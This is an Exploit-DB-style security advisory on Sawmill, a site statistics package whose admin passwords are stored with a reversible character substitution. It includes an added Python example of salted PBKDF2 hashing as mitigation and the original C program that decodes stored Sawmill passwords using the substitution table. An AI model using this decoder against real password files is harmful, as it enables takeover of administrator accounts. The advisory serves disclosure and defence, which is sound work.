Vendor: Sawmill
By: Larry W. Cashdollar
CVSS: 2.1 (LOW)
CWE: 327 (Weak Hash Function)
Product Name: Sawmill
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix, Windows and Mac OS
Year: 2002

Decrypt password for Sawmill admin account

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. Combined with the file disclosure vulnerability in Sawmill (BID 1402), this could allow an attacker to read the contents of Sawmill's password file, decrypt the password, and gain Sawmill administrative capabilities.

Mitigation:

Ensure that passwords are encrypted using a strong hash function.
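The following is an added example of what the mitigation asks for; it is not Sawmill code and not part of the original advisory. Where the advisory's decrypt.c shows a stored value that is the same length as the password and is reversed by a fixed table lookup, a salted, iterated password hash (PBKDF2-HMAC-SHA256 here) produces a fixed-length digest that cannot be inverted by table lookup, gives two accounts with the same password different stored values, and is checked by recomputation in constant time. The iteration count, salt size and the `algorithm$iterations$salt$digest` record layout are assumptions chosen for this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Parameters below are assumptions for this example, not Sawmill settings.
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # cost factor; raise it as hardware gets faster
SALT_BYTES = 16        # per-password random salt


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Derive a salted, iterated digest and return a self-describing record
    'algorithm$iterations$salt_hex$digest_hex' suitable for a password file."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and parameters and compare
    in constant time. A malformed or foreign record never verifies."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        iterations = int(iterations)
    except ValueError:
        return False
    if algorithm != ALGORITHM or iterations < 1:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return hmac.compare_digest(actual, expected)


def salt_makes_records_unlinkable(password: str) -> bool:
    """Two accounts with the same password must not share a stored value,
    yet both records must still verify. Returns True when that holds."""
    first, second = hash_password(password), hash_password(password)
    return (first != second
            and verify_password(password, first)
            and verify_password(password, second))


if __name__ == "__main__":
    # Constructed sample input; not a real credential.
    record = hash_password("example-admin-passphrase")
    print(record)
    print("verify correct :", verify_password("example-admin-passphrase", record))
    print("verify wrong   :", verify_password("guess", record))
    print("salt effective :", salt_makes_records_unlinkable("example-admin-passphrase"))
```

The digest part of every record is 64 hex characters whatever the password length, so a disclosed password file no longer reveals length or per-character structure; the salt and iteration count travel with the record so parameters can be raised later without rehashing every account at once.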

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1403/info
/* Decrypt password for Sawmill admin account.

   Larry W. Cashdollar
   lwc@vapid.betteros.org
   http://vapid.betteros.org
   usage: ./decrypt cyphertext
*/

#include <stdio.h>
#include <string.h>   /* strncpy, strlen */

/* Plaintext alphabet and, at the same index, the character Sawmill stores
   in its place: the stored value is a per-character substitution, so
   decoding is a table lookup. */
char *alpha  = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{
  size_t x, y;
  char cypher[128];

  if (argc < 2)
    {
      fprintf (stderr, "usage: %s cyphertext\n", argv[0]);
      return 1;
    }

  /* strncpy does not terminate the buffer when the input fills it. */
  strncpy (cypher, argv[1], sizeof (cypher) - 1);
  cypher[sizeof (cypher) - 1] = '\0';

  /* For each stored character, print the plaintext character found at
     the same index of the alphabet table. */
  for (x = 0; x < strlen (cypher); x++)
    {
      for (y = 0; y < strlen (encode); y++)
        if (cypher[x] == encode[y])
          printf ("%c", alpha[y]);
    }

  printf ("\n\"+\" could also be a space [ ]\n");

  return 0;
}